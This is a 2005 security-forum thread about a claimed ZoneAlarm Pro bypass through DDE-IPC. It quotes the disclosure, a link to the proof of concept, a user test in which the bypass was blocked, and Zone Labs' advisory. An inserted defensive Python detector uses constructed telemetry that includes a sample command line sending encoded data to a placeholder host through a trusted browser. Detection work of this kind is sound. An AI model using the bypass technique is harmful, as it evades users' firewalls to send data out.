CastleCops, Internet Crime Fighters

Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC

 
Post new topic   Reply to topic       All -> FavForums -> Zone Alarm [del.icio.us!] [digg it!] [reddit!]
View previous topic :: View next topic  
Author Message
Paul
CastleCops Founder

PostPosted: Wed Sep 28, 2005 11:29 pm    Post subject: Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC

Quote:
Date: Thu, 29 Sep 2005 00:18:24 +0530
From: Debasis Mohanty <>
To: full-disclosure
Subject: [Full-disclosure] Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC

Hi All !!

While I was testing desktop-based firewalls (here Zone Alarm Pro) with the
firewall evasion kit developed by me, I found that a very old flaw still
exists in many of the latest versions of desktop-based firewalls. It is
possible for a malicious program to bypass a desktop-based firewall by using
DDE-IPC (Direct Data Exchange - Interprocess Communications), which enables
an untrusted program to communicate with the attacker or access the internet
via other trusted programs (e.g. Internet Explorer). This flaw has been known
since before 2003.

As per a post by Te Smith (Sr. Director, Corporate Communications, Zone
Labs), this issue is resolved in higher versions of Zone Alarm Pro that have
the Advanced Program Control feature. (Ref #
http://seclists.org/lists/bugtraq/2003/Jul/0000.html) However, I find that
this issue still exists in higher versions of Zone Alarm Pro and might also
exist in other desktop-based firewalls.

I didn't find any good PoC around, so I thought of writing a PoC which can
demonstrate and explain how an untrusted program can access the internet or
establish a connection with the attacker via other trusted programs by
leveraging the DDE-IPC design flaw.

The PoC can be downloaded from the following link:
http://hackingspirits.com/vuln-rnd/vuln-rnd.html


_________________
Paul Laudanski - http://www.laudanski.com
http://www.linkedin.com/pub/1/49a/17b
Hoov
Zone Alarm Host, PIRT Handler

PostPosted: Thu Sep 29, 2005 1:23 am    Post subject:

I am going to pass this along, as well as download this PoC and see if there is any truth to this.


_________________
For ZoneAlarm help http://www.donhoover.net
chiawaikian
Major

PostPosted: Thu Sep 29, 2005 7:03 am    Post subject:

I have passed it along too. Thanks Paul.


_________________
Security and Malware Board
My blog
fax
Corporal, Premium Member

PostPosted: Thu Sep 29, 2005 5:38 pm    Post subject: PoC Failed...

Tested in ZA Pro and PoC failed.

A 'dangerous behaviour' alert is displayed indicating that 'zabypass.exe' is trying to communicate with 'iexplorer.exe' by using DDE. Deny access and the firewall blocks the PoC.

So where is the vulnerability?

Fax




[Attachment: Image1.jpg (screenshot of the ZA Pro alert)]
Hoov
Zone Alarm Host, PIRT Handler

PostPosted: Thu Sep 29, 2005 6:24 pm    Post subject:

Probably nowhere, but even if there is none, it's good to know about these things because they spread like wildfire once the accusation is made. Most times it is because either an old version is being used, or the configuration is such that there are holes in the firewall.


_________________
For ZoneAlarm help http://www.donhoover.net
Paul
CastleCops Founder

PostPosted: Thu Sep 29, 2005 9:36 pm    Post subject:

Thanks for the test and verification.


_________________
Paul Laudanski - http://www.laudanski.com
http://www.linkedin.com/pub/1/49a/17b
Hoov
Zone Alarm Host, PIRT Handler

PostPosted: Thu Sep 29, 2005 11:14 pm    Post subject:

Hopefully ZoneLabs will give an official statement about this.


_________________
For ZoneAlarm help http://www.donhoover.net


Paul
CastleCops Founder

PostPosted: Fri Sep 30, 2005 2:10 am    Post subject:

This came across the wire:

Quote:
Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro)
Using DDE-IPC"

Overview:

Debasis Mohanty published a notice about a potential security issue
with personal firewalls to several security email lists on
September 28th, 2005. Zone Labs has investigated his claims
and has determined that current versions of Zone Labs and
Check Point end-point security products are not vulnerable.


Description:

The proof-of-concept code published uses the Windows API function
ShellExecute() to launch a trusted program that is used to access
the network on behalf of the untrusted program, thereby accessing
the network without warning from the firewall.


Impact:

If successfully exploited, a malicious program may be able to
access the network via a trusted program. The ability to
access the network would be limited to the functionality of the
trusted program.


Unaffected Products:

ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
and ZoneAlarm Security Suite version 6.0 or later automatically
protect against this attack in the default configuration.

ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
and ZoneAlarm Security Suite version 5.5 are protected against
this attack by enabling the "Advanced Program Control" feature.

Check Point Integrity client versions 6.0 and 5.5 are protected
against this attack by enabling the "Advanced Program Control" feature.


Affected Products:

ZoneAlarm free versions lack the "Advanced Program Control"
feature and are therefore unable to prevent this bypass technique.


Recommended Actions:

Subscribers should upgrade to the latest version of their
ZoneAlarm product or enable the "Advanced Program Control" feature.


Related Resources:

Zone Labs Security Services http://www.zonelabs.com/security


Contact:

Zone Labs customers who are concerned about this vulnerability or
have additional technical questions may reach our Technical Support
group at: http://www.zonelabs.com/support/.

To report security issues with Zone Labs products contact
security@zonelabs.com. Note that any other matters sent to this
email address will not receive a response.


Disclaimer:

The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information. Zone Labs and Zone Labs
products, are registered trademarks of Zone Labs LLC. and/or
affiliated companies in the United States and other countries.
All other registered and unregistered trademarks represented in
this document are the sole property of their respective
companies/owners.

Copyright: (c)2005 Zone Labs LLC All rights reserved. Zone Labs,
TrueVector, ZoneAlarm, and Cooperative Enforcement are registered
trademarks of Zone Labs LLC The Zone Labs logo, Check Point
Integrity and IMsecure are trademarks of Zone Labs, LLC. Check Point
Integrity protected under U.S. Patent No. 5,987,611. Reg. U.S. Pat.
& TM Off. Cooperative Enforcement is a service mark of Zone Labs LLC.
All other trademarks are the property of their respective owners.
Any reproduction of this alert other than as an unmodified copy of
this file requires authorization from Zone Labs. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by Zone Labs LLC.


_________________
Paul Laudanski - http://www.laudanski.com
http://www.linkedin.com/pub/1/49a/17b
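The advisory above describes the bypass from the host's point of view: an untrusted process calls ShellExecute() to start a trusted program, and the trusted program then reaches the network on the untrusted one's behalf. What a defender can observe is a process-creation event whose child is a program the firewall trusts, whose parent is not a normal launcher for it, and whose command line may already carry the destination URL. The script below is an added example, not code from the thread, from Zone Labs or from the PoC author; it applies that heuristic to a few constructed process-creation records. The record format, the trusted-program and expected-launcher lists, and every log line are assumptions made for the example; the only name taken from the thread is zabypass.exe, which fax's screenshot reported as the PoC binary.

```python
"""Flag trusted network-facing programs launched by an unexpected parent.

Heuristic (defensive, host-side): a personal firewall that trusts iexplore.exe
cannot tell on its own whether the browser was started by the user or by an
untrusted program via ShellExecute().  Process-creation telemetry can: the
parent image is recorded.  This example scans constructed records and returns
a severity per suspicious launch.  Record format, program lists and sample
lines are all constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcCreate:
    parent: str   # image name of the creating process
    child: str    # image name of the created process
    cmdline: str  # full command line of the created process


# Programs a personal firewall typically grants outbound access to.
# Constructed list; a real deployment would derive it from the firewall's
# own trusted-program table.
TRUSTED_NETWORK_PROGRAMS = {"iexplore.exe", "outlook.exe"}

# Parents that legitimately start those programs (shell, logon, mail client).
EXPECTED_LAUNCHERS = {"explorer.exe", "userinit.exe", "outlook.exe"}

# A URL on the command line means the launch already carries data outward.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def parse_record(line: str) -> ProcCreate:
    """Parse one constructed record: 'parent=...;image=...;cmdline=...'."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split(";"))
    return ProcCreate(
        parent=fields["parent"].lower(),
        child=fields["image"].lower(),
        cmdline=fields["cmdline"],
    )


def classify(ev: ProcCreate) -> Optional[str]:
    """Return 'high', 'medium' or None for a single process-creation event."""
    if ev.child not in TRUSTED_NETWORK_PROGRAMS:
        return None  # child does not carry firewall trust, nothing to proxy through
    if ev.parent in EXPECTED_LAUNCHERS:
        return None  # normal user-driven launch
    # Unexpected parent started a trusted program: suspicious.  A URL in the
    # command line means the trusted program was handed its destination at
    # launch, so rate that higher than a bare launch (where DDE could follow).
    return "high" if URL_RE.search(ev.cmdline) else "medium"


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (parent, child, severity) for every flagged record."""
    hits = []
    for ev in map(parse_record, lines):
        sev = classify(ev)
        if sev is not None:
            hits.append((ev.parent, ev.child, sev))
    return hits


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    'parent=explorer.exe;image=iexplore.exe;cmdline="iexplore.exe" http://www.zonelabs.com/security',
    'parent=zabypass.exe;image=iexplore.exe;cmdline="iexplore.exe" http://example.invalid/?d=Zm9vYmFy',
    'parent=notepad.exe;image=iexplore.exe;cmdline="iexplore.exe"',
    'parent=zabypass.exe;image=notepad.exe;cmdline="notepad.exe" C:\\temp\\x.txt',
]

if __name__ == "__main__":
    for parent, child, sev in scan(SAMPLE_EVENTS):
        print(f"{sev:6s} {parent} -> {child}")
```

The first record is the everyday case (the shell opening the browser) and is ignored; the second is the pattern the advisory describes and is rated high because the destination travels on the command line; the third is a bare launch from an unrelated parent and is rated medium; the fourth is ignored because notepad.exe carries no firewall trust. The heuristic is deliberately narrow: it does not see DDE traffic itself, only the launch, so it complements rather than replaces the "Advanced Program Control" style of check the advisory recommends.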
patermann
Captain, Premium Member

PostPosted: Fri Sep 30, 2005 8:50 am    Post subject:

Quote:
Affected Products:

ZoneAlarm free versions lack the "Advanced Program Control" feature and are therefore unable to prevent this bypass technique.

It appears that ZA free does not protect me as much as I thought it did. I don't know if any free firewalls are immune to this attack, but I think I am going to have to look for one...


_________________
Folding for all it is worth...
Why it is good to fold / F@H Home Page / F@H links
chiawaikian
Major

PostPosted: Fri Sep 30, 2005 1:30 pm    Post subject:

Good luck finding.

There aren't many free firewalls that offer the same level of protection as ZoneAlarm.


_________________
Security and Malware Board
My blog
fax
Corporal, Premium Member

PostPosted: Fri Sep 30, 2005 3:10 pm    Post subject:

The choice of free firewalls is shrinking very rapidly, at least during these last months… you may want to try Kerio or Sygate; however, both products have been sold out. And, compared to ZA free, they both perform quite poorly against other leak tests.

Fax

chiawaikian
Major

PostPosted: Sat Oct 01, 2005 1:35 am    Post subject:

Between Kerio and Sygate, Kerio will be a better choice IMO. Sygate has been bought over by Symantec, the maker of the resource-hogger Norton.


_________________
Security and Malware Board
My blog
Paul
CastleCops Founder

PostPosted: Sat Oct 01, 2005 1:40 am    Post subject:

KPF has been discontinued actually.


_________________
Paul Laudanski - http://www.laudanski.com
http://www.linkedin.com/pub/1/49a/17b
chiawaikian
Major

PostPosted: Sat Oct 01, 2005 2:05 am    Post subject:

Ok thanks. I just read about it:
CastleCops Link/t132232-Kerio_Personal_Firewall_will_be_discontinued.html

Another great firewall gone. I will be sticking with ZoneAlarm.


_________________
Security and Malware Board
My blog